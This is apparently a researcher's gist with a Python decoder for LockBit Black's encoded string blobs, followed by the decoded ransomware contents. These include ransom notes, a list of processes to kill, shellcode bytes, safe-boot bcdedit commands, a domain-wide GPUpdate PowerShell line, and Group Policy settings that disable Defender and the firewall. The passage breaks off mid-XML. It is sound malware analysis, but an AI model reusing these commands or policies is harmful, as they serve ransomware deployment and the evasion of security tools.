
@sysopfb
Created July 8, 2022 20:29
lockbit black blob decoding POC

Blobs in LockBit Black are decoded similarly to BlackMatter, but with a new LCG based on 64-bit arithmetic.

The initial seed for the sample I RE'd was at the start of the .pdata section.

POC decoder; pretty quick and dirty due to time constraints.

def mul64(a1, a2):
    """Return the full-precision product of a1 and a2.

    Python ints do not wrap, so the caller masks the result to 64 bits.
    """
    product = a1 * a2
    return product

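def LCG(a1, seed=None):
    """Advance the 64-bit LCG and derive the xor key for the next block.

    Args:
        a1: current LCG state.
        seed: constant multiplier used for the key derivation. Defaults to the
            module-level ``init_seed`` (the sample's initial seed) so existing
            callers are unchanged; pass it explicitly to reuse the function for
            another sample or to test it in isolation.

    Returns:
        ``(xor_key, new_state)``; the caller feeds ``new_state`` back in as
        ``a1`` to obtain the key for the following block.
    """
    if seed is None:
        seed = init_seed
    mask = 0xffffffffffffffff
    # Multiplier and increment are the Knuth MMIX 64-bit LCG constants.
    new_state = (a1 * 0x5851f42d4c957f2d) & mask
    new_state = (new_state + 0x14057b7ef767814f) & mask
    # The xor key is not the state itself but the state scaled by the seed.
    xor_key = (seed * new_state) & mask
    return (xor_key, new_state)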

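# The snippet uses struct and sys below but never imported them.
import struct
import sys

# Per-sample constant: the initial LCG seed, found at the start of .pdata in
# the sample analysed here. Change it for other samples.
init_seed = 0x669aec516260d2fc
# Key for the first 8-byte block and the state that produces the next one.
(xor_key, new_seed) = LCG(init_seed)

# The encoded blob is the only argument; read it whole and close the handle.
with open(sys.argv[1], 'rb') as blob_file:
    bdata = bytearray(blob_file.read())
# bytearray('') is Python 2 only; the empty constructor works on 2 and 3.
out = bytearray()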

for i in range(len(bdata)/8):
    key = bytearray(struct.pack('<Q', xor_key))
    data = bdata[i*8:(i+1)*8]
    data[0] ^= key[0]
    data[1] ^= key[5]
    data[2] ^= key[1]
    data[3] ^= key[4]
    data[4] ^= key[2]
    data[5] ^= key[7]
    data[6] ^= key[3]
    data[7] ^= key[6]
    out += data
    (xor_key, new_seed) = LCG(new_seed)

key = bytearray(struct.pack('<Q', xor_key))
rest = len(bdata) - len(out)
while rest > 0:
    data = bdata[(i+1)*8:]
    data[0] ^= key[0]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[1] ^= key[5]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[2] ^= key[1]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[3] ^= key[4]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[4] ^= key[2]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[5] ^= key[7]
    rest -= 1
    if rest == 0:
        out += data
        break
    data[6] ^= key[3]
    rest -= 1
    if rest == 0:
        out += data
        break

Two decoded objects:

>>> import aplib
>>> aplib.decompress(str(out)).do()
('LockBit Black Ransomware\r\n\r\nYour data are stolen and encrypted\r\n\r\nThe data will be published on TOR website\r\nhttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion\r\nand http://lockbitapt.uz if you do not pay the ransom\r\n\r\nYou can contact us and decrypt one file for free on these TOR sites\r\nhttp://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onion\r\nhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion\r\nhttp://lockbitsupp.uz\r\n\r\nDecryption ID: %s', 358)

>>> import aplib
>>> aplib.decompress(str(out)).do()
('\xb3\x0c\x86"\xdbS\xffY]\xc0Vm(\xcd\xb9\xec\xcd\x1e\xe6\xaf\xb4\xa6\xc5z\xa1\x02\xa7\xa9)W\x8c\xfb\xb5AV\xc4\xf4\x98\x06\x93\xe0D\xa0\x04;\xb6\x80*\x8b\x13\xdd\xfb7\xb2\x84K\xa3\xadS\x94\x8b\x0egit\x84\xcb\x1f\xe2\x02\x06\xe4D\tY\x04\xcc\x91\xfa\xe53]\xa7\xe8\xb8Os\x13\xd0x\xa9ZQ\xbaLJV\x02\x93^A\xb6\xef%$]H\x8f\xa7\x7ftE\xa2XP%\xafgC\x1b\xf7~\xbc:L\xa4\x08r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01\x01\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x01\x00\x00\x00\x01\x00\x00(\x00\x00\x00\xa9\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfb\x01\x00\x00\xd0\x04\x00\x00\x00\x00\x00\x00\xc5\x05\x00\x00\x02\x06\x00\x00LSEKA82B8oz1eHAmNX5oJtdsQuNYac7Gp9HypsA7puE4C8tS3bjK3E5OADaVZQirlON1Lq6OAa7UJUtMNXnwB3X5ZmuSOOq3lOZmU5tYG817Ot5cO2IiurM3Ou8AAAAA\x00FarMhpsJBzmWrgzwVqvI/FKi0oIA7GuEN1mX2/WmOsLkV6qFNariy9H3zsgAAAAA\x00AA6wZwAZsMWAG0jFQBigx0AacMdAGBDJQBsgycAbaMkAHGDJQB2Qyf7L/KHxlLpKMZbiSnGX4mQAG2DLgBywywAeKM0AG4DTwBhg1YCrnsnAGHjVwBiY1QAZwNUAGTDbgBtY28AbIN0AHAjdwBwY3cAcgN3bt2tKwByo3QAbmN83eMpMwBjA4YAcMOPAHIjhwBto5wAdgOfAGJDpABqY6QAcYOlAHpjpepsuzZPFFq8AHMDxwNhe4UAZyNkAHQjTwBxI3QAZEOMAAAAA\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\x00dgBzAHMAAABzAHEAbAAAAHMAdgBjACQAAABtAGUAbQB0AGEAcwAAAG0AZQBwAG8AYwBzAAAAbQBzAGUAeABjAGgAYQBuAGcAZQAAAHMAbwBwAGgAbwBzAAAAdgBlAGUAYQBtAAAAYgBhAGMAawB1AHAAAABHAHgAVgBzAHMAAABHAHgAQgBsAHIAAABHAHgARgBXAEQAAABHAHgAQwBWAEQAAABHAHgAQwBJAE0AZwByAAAAAAB=\x009eI2aT+JI/6mK24RWVph+56xzKxJz8hUMueEk2KNA/RlvDtKIiKkUHjm6X1=\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\x00', 15686)

The base64 blob contains UTF-16 strings:

u'sql\x00oracle\x00ocssd\x00dbsnmp\x00synctime\x00agntsvc\x00isqlplussvc\x00xfssvccon\x00mydesktopservice\x00ocautoupds\x00encsvc\x00firefox\x00tbirdconfig\x00mydesktopqos\x00ocomm\x00dbeng50\x00sqbcoreservice\x00excel\x00infopath\x00msaccess\x00mspub\x00onenote\x00outlook\x00powerpnt\x00steam\x00thebat\x00thunderbird\x00visio\x00winword\x00wordpad\x00notepad\x00\x00'


sysopfb commented Jul 11, 2022

Decoded blobs from sample: d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee

u'LockBit Black\r\n\r\nAll your important files are stolen and encrypted!\r\nYou must find %s file\r\nand follow the instruction!\x00'
'                                    Lock    '

"\xe8\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00wtsapi32.dll\x00[h\xb2^\xd0'\xe8\xad\x00\x00\x00\x8dK\x10Q\xff\xd0h\xc2Q\xba\x1b\xe8\x9d\x00\x00\x00\x8b\x13\x8dK\x08QR\xff\xd0h\x81\xf0\xfd\xa9\xe8\x8a\x00\x00\x00\x8dK\x0c\x8bS\x08j\x02j\x00j\x00Q\xffs\x04Rj\xff\xff\xd0h\x1a\xfd?\x1a\xe8k\x00\x00\x00\x8b\xf0\xffs\x04\xff\xd6\xffs\x08\xff\xd6\x8bC\x0c\xc3U\x8b\xecRV3\xc0\x8bU\x0c\x8bu\x08f\xadf\x83\xf8Ar\nf\x83\xf8Zw\x04f\x83\xc8 \x80\xc6a\x80\xeea\xc1\xca\r\x03\xd0\x85\xc0u\xdf\x8b\xc2^Z]\xc2\x08\x00U\x8b\xecRV3\xc0\x8bU\x0c\x8bu\x08\xac\x80\xc6a\x80\xeea\xc1\xca\r\x03\xd0\x85\xc0u\xf0\x8b\xc2^Z]\xc2\x08\x00U\x8b\xec\x83\xc4\xf4SQRVW\xc7E\xfc\x00\x00\x00\x00d\xa10\x00\x00\x00\x8b@\x0c\x8dX\x0c\x8bH\x0c\x8bY\x18\x8bC<\x03\xc3\x8bPx\x85\xd2t^\x8dy,j\x00\xffw\x04\xe8h\xff\xff\xff\x89E\xf4\x03\xd3\x8bB\x18\x85\xc0t=\x89E\xf8\x8br \x8bz$\x03\xf3\x03\xfb\xad\x03\xc3\xffu\xf4P\xe8y\xff\xff\xff;E\x08u\x13\x0f\xb77\xc1\xe6\x02\x03r\x1c\x03\xf3\xad\x03\xc3\x89E\xfc\xeb\x0c\x83\xc7\x02\xffM\xf8\x83}\xf8\x00u\xd0\x83}\xfc\x00t\x02\xeb\x06\x8b\t;\xd9u\x8d\x8bE\xfc_^ZY[\x8b\xe5]\xc2\x04\x00"


"H\x83\xecH\xe8)\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00wtsapi32.dll\x00[\xb9\xb2^\xd0'\xe8\xed\x00\x00\x00H\x8dK\x1c\xff\xd0\xb9\xc2Q\xba\x1b\xe8\xdd\x00\x00\x00\x8b\x0bH\x8dS\x0c\xff\xd0\xb9\x81\xf0\xfd\xa9\xe8\xcb\x00\x00\x00L\x8dK\x14H\x8bS\x0cH\xc7\xc1\xff\xff\xff\xffL\x8bC\x04H\xc7D$ \x00\x00\x00\x00H\xc7D$(\x00\x00\x00\x00H\xc7D$0\x02\x00\x00\x00\xff\xd0\xb9\x1a\xfd?\x1a\xe8\x91\x00\x00\x00L\x8b\xf8H\x8bK\x04A\xff\xd7H\x8bK\x0cA\xff\xd7H\x8bC\x14H\x83\xc4H\xc3H\x89L$\x08\x89T$\x10HUSVH\x8b\xec3\xc0\x8b](H\x8bu f\xadf\x83\xf8Ar\nf\x83\xf8Zw\x04f\x83\xc8 \x80\xc7a\x80\xefa\xc1\xcb\r\x03\xd8\x85\xc0u\xdfH\x8b\xc3H\x8b\xe5^[]\xc3H\x89L$\x08\x89T$\x10HUSVH\x8b\xec3\xc0\x8b](H\x8bu \xac\x80\xc7a\x80\xefa\xc1\xcb\r\x03\xd8\x85\xc0u\xf0H\x8b\xc3H\x8b\xe5^[]\xc3\x89L$\x08HURSVWAPAQH\x83\xec0H\x8dl$0H\xc7E\xf8\x00\x00\x00\x00eH\x8b\x04%`\x00\x00\x00H\x8b@\x18H\x8dX\x10L\x8b@\x10I\x8bX0\x8bC<H\x03\xc3D\x8b\x88\x88\x00\x00\x00E\x85\xc9toI\x8dxXH\x8bO\x083\xd2\xe80\xff\xff\xff\x89E\xf0L\x03\xcbA\x8bA\x18\x85\xc0tI\x89E\xf4A\x8bq A\x8by$H\x03\xf3H\x03\xfb\xadH\x03\xc3H\x8b\xc8\x8bU\xf0\xe8F\xff\xff\xff;E@u\x17\x0f\xb77\xc1\xe6\x02A\x03q\x1cH\x03\xf3\xadH\x03\xc3H\x89E\xf8\xeb\rH\x83\xc7\x02\xffM\xf4\x83}\xf4\x00u\xc8H\x83}\xf8\x00t\x02\xeb\x0cM\x8b\x00I;\xd8\x0f\x85o\xff\xff\xffH\x8bE\xf8H\x8de\x00AYAX_^[Z]\xc3"


j\xe8\x00


'LockBit Black Ransomware\r\n\r\nYour data are stolen and encrypted\r\n\r\nThe data will be published on TOR website\r\nhttp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion\r\nand http://lockbitapt.uz if you do not pay the ransom\r\n\r\nYou can contact us and decrypt one file for free on these TOR sites\r\nhttp://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onion\r\nhttp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion\r\nhttp://lockbitsupp.uz\r\n\r\nDecryption ID: %s'

'"host_hostname":"%s",\r\n"host_user":"%s",\r\n"host_os":"%s",\r\n"host_domain":"%s",\r\n"host_arch":"%s",\r\n"host_lang":"%s",\r\n%s'

'{\r\n"disk_name":"%s",\r\n"disk_size":"%u",\r\n"free_size":"%u"\r\n}'

'"disks_info":[\r\n%s\r\n]'

'Mozilla/5.0 (Windows NT 6.1)'

'AppleWebKit/587.38 (KHTML, like Gecko)'

'Chrome/91.0.4472.77'

'Safari/537.36'

'Edge/1.0.864.3'

'Firefox/89.0'

'Gecko/20100101'

'\r\nAccept: */*\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: text/plain'

'{\r\n"bot_version":"%s",\r\n"bot_id":"%s",\r\n"bot_company":"%.8x%.8x%.8x%.8x%",\r\n%s\r\n}'


'{\r\n"bot_version":"%s",\r\n"bot_id":"%s",\r\n"bot_company":"%.8x%.8x%.8x%.8x%",\r\n"stat_all_files":"%u",\r\n"stat_not_encrypted":"%u",\r\n"stat_size":"%s",\r\n"execution_time":"%u",\r\n"start_time":"%u",\r\n"stop_time":"%u"\r\n}'


Onboard EXE file: 917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2


'\xda\xbd\x07\xbb\x86\xfc\x96\x07\xd2\xed\x0b\xb5xl\xa1W'


'SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE'

'DisablePrivacyExperience'

'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'

'AutoAdminLogon'

'DefaultUserName'


'DefaultDomainName'


'DefaultPassword'


'bcdedit /set {current} safeboot network'

'bcdedit /deletevalue {current} safeboot'

'bootcfg /raw /a /safeboot:network /id 1'

'bootcfg /raw /fastdetect /id 1'

'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce'


'%s -pass %s'


Onboard EXE: 63c8efca0f52ebea1b3b2305e17580402f797a90611b3507fab6fffa7f700383


"powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}"

'<?xml version="1.0" encoding="utf-8"?>\r\n<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}">\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLPBDMS" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLPBENGINE" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0"><Properties startupType="DISABLED" serviceName="MSSQLFDLauncher" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLSERVERAGENT" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="MSSQLServerOLAPService" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SSASTELEMETRY" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0"><Properties 
startupType="DISABLED" serviceName="SQL Server Distributed Replay Client" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Controller" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="MsDtsServer150" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SSISTELEMETRY150" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SSISScaleOutMaster150" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SSISScaleOutWorker150" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="MSSQLLaunchpad" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLTELEMETRY" image="4" changed="%s" 
uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="SQLTELEMETRY" serviceAction="STOP" timeout="30"/></NTService>\r\n\t<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0"><Properties startupType="DISABLED" serviceName="MSSQLSERVER" serviceAction="STOP" timeout="60"/></NTService>\r\n</NTServices>\r\n'


'<?xml version="1.0" encoding="utf-8"?>\r\n<Files clsid="{215B2E53-57CE-475c-80FE-9EEC14635851}">\r\n\t<File clsid="{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}" name="%s" status="%s" image="2" bypassErrors="1" changed="%s" uid="%s">\r\n\t<Properties action="U" fromPath="%s" targetPath="%s" readOnly="0" archive="1" hidden="0" suppress="0"/>\r\n\t</File>\r\n</Files>\r\n'

'<?xml version="1.0" encoding="utf-8"?>\r\n<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">\r\n\t<TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="%s" image="2" changed="%s" uid="%s"><Properties action="U" name="%s" runAs="%s" logonType="InteractiveToken"><Task version="1.2"><RegistrationInfo><Author>%s</Author><Description></Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%s</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>false</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>false</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority></Settings><Triggers><RegistrationTrigger><Enabled>true</Enabled></RegistrationTrigger></Triggers><Actions Context="Author"><Exec><Command>%s</Command><Arguments>%s</Arguments></Exec></Actions></Task></Properties></TaskV2>\r\n</ScheduledTasks>\r\n'

'PReg\x01[SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeDC;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeOffsetDC;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTime;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeOffset;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows\\System;EnableSmartScreen;\x04;\x04;][SOFTWARE\\Policies\\Microsoft\\Windows\\System;**del.ShellSmartScreenLevel;\x01;\x04; ][SOFTWARE\\Policies\\Microsoft\\Windows Defender;DisableAntiSpyware;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows Defender;DisableRoutinelyTakingAction;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection;DisableRealtimeMonitoring;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection;DisableBehaviorMonitoring;\x04;\x04;\x01][SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet;SubmitSamplesConsent;\x04;\x04;\x02][SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet;SpynetReporting;\x04;\x04;][SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile;EnableFirewall;\x04;\x04;][SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile;EnableFirewall;\x04;\x04;]'

'\xef\xbb\xbf<?xml version=\'1.0\' encoding=\'utf-8\'?>\r\n<policyComments xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/CommentDefinitions">\r\n  <policyNamespaces>\r\n    <using prefix="ns0" namespace="Microsoft.Policies.GroupPolicy"></using>\r\n    <using prefix="ns1" namespace="Microsoft.Policies.SmartScreen"></using>\r\n    <using prefix="ns2" namespace="Microsoft.Policies.WindowsDefender"></using>\r\n    <using prefix="ns3" namespace="Microsoft.Policies.WindowsFirewall"></using>\r\n  </policyNamespaces>\r\n  <comments>\r\n    <admTemplate></admTemplate>\r\n  </comments>\r\n  <resources minRequiredRevision="1.0">\r\n    <stringTable></stringTable>\r\n  </resources>\r\n</policyComments>'

'<?xml version="1.0" encoding="utf-8"?>\r\n<NetworkShareSettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}">\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_D" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_D" path="D:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_E" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_E" path="E:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_F" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_F" path="F:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_G" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_G" path="G:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_H" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_H" path="H:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_I" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_I" path="I:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_J" changed="%s" uid="%s"><Properties action="U" 
name="%%ComputerName%%_J" path="J:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_K" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_K" path="K:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_L" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_L" path="L:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_M" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_M" path="M:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_N" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_N" path="N:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_O" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_O" path="O:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_P" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_P" path="P:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_Q" changed="%s" 
uid="%s"><Properties action="U" name="%%ComputerName%%_Q" path="Q:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_R" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_R" path="R:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_S" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_S" path="S:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_T" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_T" path="T:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_U" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_U" path="U:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_V" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_V" path="V:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/></NetShare>\r\n\t<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_W" changed="%s" uid="%s"><Properties action="U" name="%%ComputerName%%_W" path="W:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" 